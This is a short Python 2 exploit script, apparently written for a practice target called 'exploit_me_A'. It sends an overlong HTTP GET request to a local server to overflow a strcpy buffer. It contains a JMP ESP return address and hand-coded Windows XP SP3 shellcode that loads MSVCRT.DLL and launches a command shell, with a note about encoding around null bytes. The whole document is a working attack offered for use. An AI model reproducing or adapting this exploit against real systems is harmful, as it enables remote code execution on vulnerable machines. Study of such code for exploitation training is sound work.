#python exploit_me_A overflow exploit by k8team
#注意 如果shellcode中 出现0x00 得
加密后再(因为strcpy函数截断0x00)
#python 2.7.3
import httplib
conn = httplib.HTTPConnection("127.0.0.1:8888")
a = 'A' * 100 + 'B' * 50 + 'C' * 20 + 'D'*20+ '123456'+'BBBB'
JMPESP = "\x12\x45\xFA\x7F"
JMPback = "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4"
#Shellcode cmd XP SP3
shellcode="\x55\x8B\xEC\x33\xC0\x50\x50\x50"
shellcode+="\xC6\x45\xF4\x4D"
shellcode+="\xC6\x45\xF5\x53"
shellcode+="\xC6\x45\xF6\x56"
shellcode+="\xC6\x45\xF7\x43"
shellcode+="\xC6\x45\xF8\x52"
shellcode+="\xC6\x45\xF9\x54"
shellcode+="\xC6\x45\xFA\x2E"
shellcode+="\xC6\x45\xFB\x44"
shellcode+="\xC6\x45\xFC\x4C"
shellcode+="\xC6\x45\xFD\x4C"
shellcode+="\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2"
shellcode+="\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D"
shellcode+="\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
shellcode+="\x89\x45\xF8\xB8\x63\x6F\x6D\x22"
shellcode+="\x89\x45\xFC\x33\xD2\x88\x55\xFF"
shellcode+="\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";
a = 'A' * 100 + 'B' * 50 + 'C' * 20 + 'D' * 20 + '123456' + JMPESP + shellcode
#a = 'A' *(4051 - len(shellcode)-len(JMPESP))
#a = 'A' *(4051 - len(shellcode)-len(JMPESP)-len(JMPback))
buffer = a + shellcode +JMPESP + JMPback
conn.request("GET",a)